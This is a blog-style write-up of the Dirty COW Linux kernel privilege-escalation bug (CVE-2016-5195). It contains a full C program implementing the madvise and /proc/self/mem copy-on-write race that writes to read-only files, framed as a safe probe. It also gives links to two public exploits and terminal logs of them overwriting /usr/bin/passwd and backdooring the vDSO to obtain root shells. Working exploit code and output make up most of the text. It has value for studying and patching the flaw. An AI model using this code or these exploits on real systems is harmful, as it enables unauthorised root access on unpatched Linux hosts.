
CVE-2016-5195 Dirtycow

Overview

The recently disclosed Dirty COW bug affects Linux kernel >= 2.6.22 (released in 2007; the fix only landed on October 18, 2016). It is a race condition in the kernel memory subsystem's handling of copy-on-write (COW) for private mappings: an unprivileged local user who wins the race can write into the page cache of a file that is only mapped read-only, and therefore modify a root-owned file such as a setuid binary without having write permission on it. I tried the publicly available EXPs and recorded the process.
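The primitive both EXPs below rely on, shown as an added example that is not code from this page nor from either exploit: a file is mapped PROT_READ and MAP_PRIVATE; one thread repeatedly discards the private copy-on-write copy of the page with madvise(MADV_DONTNEED), while another thread repeatedly writes at the mapping address through /proc/self/mem, which makes the kernel force the access past the read-only protection. Normally the kernel breaks COW and the write lands in a private copy; when the race is won the write reaches the shared page-cache page and is written back to the file on disk. This is the same structure as the original public PoC. The victim file under /tmp, the payload string and the iteration count are this example's own choices; it needs no privileges and reports whether the file on disk actually changed.

```c
/* Added example: minimal CVE-2016-5195 (Dirty COW) probe. Not code from the
 * page or from either EXP it discusses; the temp file path, payload string
 * and iteration count are this example's own assumptions. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

#define ORIGINAL "this file is mapped read-only and must not change\n"
#define PAYLOAD  "m00000000000000000000"   /* shorter than ORIGINAL */

struct race_ctx {
    void *map;        /* PROT_READ, MAP_PRIVATE mapping of the victim file */
    size_t len;       /* bytes mapped */
    int mem_fd;       /* /proc/self/mem, opened read-write */
    long iterations;  /* loop count for each racing thread */
};

/* Thread A: keep throwing away the private (COW) copy of the page, so the
 * next access has to go back to the shared page-cache page. */
static void *madvise_thread(void *arg)
{
    struct race_ctx *ctx = arg;
    for (long i = 0; i < ctx->iterations; i++)
        (void)madvise(ctx->map, ctx->len, MADV_DONTNEED);
    return NULL;
}

/* Thread B: write through /proc/self/mem, which forces access past PROT_READ.
 * The kernel should break COW and write into a private copy; on a vulnerable
 * kernel the race lets the write hit the shared page-cache page instead. */
static void *write_thread(void *arg)
{
    struct race_ctx *ctx = arg;
    for (long i = 0; i < ctx->iterations; i++)
        (void)pwrite(ctx->mem_fd, PAYLOAD, strlen(PAYLOAD),
                     (off_t)(uintptr_t)ctx->map);
    return NULL;
}

/* Returns 1 if the file on disk changed (kernel vulnerable), 0 if it did not
 * (kernel patched, or the race was simply not won), -1 on setup failure. */
int dirtycow_probe(long iterations)
{
    char path[] = "/tmp/dirtycow-probe-XXXXXX";
    char buf[sizeof(ORIGINAL)];
    struct race_ctx ctx = { .map = NULL, .len = strlen(ORIGINAL),
                            .mem_fd = -1, .iterations = iterations };
    pthread_t ta, tb;
    int result = -1;

    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    /* Create the victim file and make it read-only, like a root-owned binary. */
    if (write(fd, ORIGINAL, ctx.len) != (ssize_t)ctx.len || fchmod(fd, 0444) != 0) {
        close(fd);
        unlink(path);
        return -1;
    }
    close(fd);

    fd = open(path, O_RDONLY);
    if (fd >= 0) {
        ctx.map = mmap(NULL, ctx.len, PROT_READ, MAP_PRIVATE, fd, 0);
        close(fd);
    }
    ctx.mem_fd = open("/proc/self/mem", O_RDWR);
    if (fd < 0 || ctx.map == MAP_FAILED || ctx.mem_fd < 0)
        goto out;

    if (pthread_create(&ta, NULL, madvise_thread, &ctx) != 0)
        goto out;
    if (pthread_create(&tb, NULL, write_thread, &ctx) != 0) {
        pthread_join(ta, NULL);
        goto out;
    }
    pthread_join(ta, NULL);
    pthread_join(tb, NULL);

    /* Judge by the file on disk, not by the mapping: the private COW copy may
     * legitimately hold PAYLOAD even on a patched kernel. */
    fd = open(path, O_RDONLY);
    if (fd >= 0) {
        ssize_t n = read(fd, buf, ctx.len);
        close(fd);
        if (n == (ssize_t)ctx.len)
            result = memcmp(buf, ORIGINAL, ctx.len) == 0 ? 0 : 1;
    }
out:
    if (ctx.mem_fd >= 0)
        close(ctx.mem_fd);
    if (ctx.map != NULL && ctx.map != MAP_FAILED)
        munmap(ctx.map, ctx.len);
    unlink(path);
    return result;
}

int main(void)
{
    int r = dirtycow_probe(2000000);
    printf("%s\n", r == 1 ? "VULNERABLE: file on disk was modified"
                 : r == 0 ? "not reproduced: file on disk unchanged"
                          : "setup failed");
    return r < 0;
}
```

Build with cc -O2 -pthread. On a patched kernel the file on disk never changes however many iterations you give it; on an old kernel a "not reproduced" result only means the race was not won within that many iterations, so treat it as evidence, not proof. Unlike the two EXPs below, a successful run here only corrupts a throwaway file under /tmp, which makes it a safe way to confirm a kernel is affected before touching anything like /usr/bin/passwd or the vDSO.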

EXP

https://www.exploit-db.com/exploits/40616/

This EXP is from exploit-db. It can easily crash the system, but when it succeeds it overwrites the setuid-root /usr/bin/passwd binary with a payload that spawns a shell (backing the original up to /tmp/bak first, as the output shows) and drops you into a root shell. Note in the output below that only the uid becomes 0; the gid stays 1000(okami). Restore /usr/bin/passwd from /tmp/bak afterwards, otherwise passwd stays broken.

okami@ubuntu14:~$ ./dirtycow
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 47032
Racing, this may take a while..
thread stopped
thread stopped
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to restore /tmp/bak
root@ubuntu14:/home/okami# id
uid=0(root) gid=1000(okami) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare),1000(okami)
root@ubuntu14:/home/okami# whoami
root
root@ubuntu14:/home/okami#

https://github.com/scumjr/dirtycow-vdso

This EXP does not crash the system, but its author says it does not work on every Linux version. In my tests it worked on Ubuntu 14, Ubuntu 16 and CentOS 7.

okami@ubuntu14:~$ ./0xdeadbeef
[*] exploit: patch 1/2
[*] vdso successfully backdoored
[*] exploit: patch 2/2
[*] vdso successfully backdoored
[*] waiting for reverse connect shell...
[*] enjoy!
[*] restore: patch 2/2
[*] vdso successfully restored
[*] restore: patch 1/2
[*] vdso successfully restored
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 14.04.5 LTS
Release:    14.04
Codename:   trusty

Note the step "waiting for reverse connect shell...": it can take a while, because the backdoor planted in the vDSO only fires when a process that is already running as root calls the patched function, so the delay depends on when such a process next does. Once it fires you get a shell that is fully root (uid=0, gid=0, as shown above), and the exploit then restores the original vDSO by itself.